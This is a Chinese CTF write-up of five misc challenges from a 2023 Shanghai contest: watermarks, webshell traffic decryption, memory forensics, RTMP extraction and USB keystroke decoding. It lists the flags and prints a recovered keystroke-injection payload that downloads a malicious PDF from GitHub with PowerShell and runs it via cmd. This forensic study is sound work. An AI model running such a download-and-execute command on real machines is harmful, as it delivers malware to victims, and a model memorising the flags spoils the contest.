第八届上海市大学生网络安全大赛磐石行动2023 misc wp

Misc

总共5题，3个一血，1个三血，不知道是不是520的原因，大家都去约会了，只有我在做题

看似赢麻了，实则输麻了

good_http

一血

盲水印，得到压缩包密码：XD8C2VOKEU

解开压缩包就是flag

complicated_http

一血

大致看了一下，传了一个shell.php上去

14704流传了一个shell，aes加密的，key为9d239b100645bd71，尝试以后发现就是简单的base64+aes，substr纯纯没用

一直尝试下去，最后在 25511流找到flag

<?php
@error_reporting(0);
function Decrypt($data)  
{  
    $key="9d239b100645bd71"; 
    $magicNum=hexdec(substr($key,0,2))%16; 
    // $data=substr($data,0,strlen($data)-$magicNum); //没用的一句
    return openssl_decrypt(base64_decode($data), "AES-128-ECB", $key,OPENSSL_PKCS1_PADDING);  
}
$input="SBUlHlBCQI4q5uAXto4aSZGYIJqdgdOd/zGfTGZaRaysJWFdgWdnnwRT5x7l/bA6pUoX8pqJNgsNiviuI6anfGgdPjNiPkl3l4seUceQgOb99PwAD9JJwbia/5GHwRTa8";
$post=Decrypt($input);
// eval($post);
echo $post;
?>

// {"status":"c3VjY2Vzcw==","msg":"ZmxhZ3sxZWM1YmU1YS1hZmJkLTQ4NjctODAwYi0zZWI3MzliOWUzYmR9Cg=="}
// flag{1ec5be5a-afbd-4867-800b-3eb739b9e3bd}

也可以cyberchef，from base64 + aes

优雅内存

三血

win10内存，尝试运行hack.exe，发现需要文件flag.png和RC4密钥

内存envars得到KEYS=c156e08e123b3dc6399c6c4e55ba2549

在本机win10上设置一下环境变量KEYS，随便搞一个flag.png，运行hack.exe后发现被加密成flag.png.enc，同时内存里扫出来一个flag.png.jpg，同样的双后缀猜测后者就是加密出来的enc文件

dumpfiles，因为RC4的加密就是解密，把dump下来的flag.png.jpg改名成flag.png，再次运行hack.exe

即可得到一个png二维码，扫码得到flag

直播信息战

一血

直播流量，rtmp

用quo/rtmp2flv: Extract FLV video from unencrypted RTMP streams. (github.com)，尝试把rtmp数据提取成flv视频

先把最大的tcp流的分组全部提取出来保存成rtmp.pcap，然后

tcpflow -T %T_%A%C%c.rtmp -r rtmp.pcap
./rtmp2flv.py *.rtmp

得到了flv视频，没声音，画面也很怪，先分帧细看，发现有点像是傅里叶变换的那种感觉，然后蒙了一个WaterMark工具梭哈就出了

flag{f2dcf7f9d3073e2ca74907339b2aa1e3}

非常坏usb - 复现

usb keyboard流量，但是击键信息在第4个字节，需要改一改脚本，得到

# (New-Object<SPACE>System.Net.WebClient).DownloadFile('https://github.com/jiayuqi7813/download/releases/download/f/mal.pdf',<SPACE>'C:\word.pdf')[unknown]cmd<SPACE>/c<SPACE>start<SPACE>C:\word.pdf[unknown]

一个github release地址，下载得到pdf

（我就卡在了这里，以为是pdf隐写，原来是里面有附件，我一直用edge看的，所以根本没显示附件）

pdf用adobe打开，看见两个附件，hackson.png和secret_info.SettingContent-ms，保存下来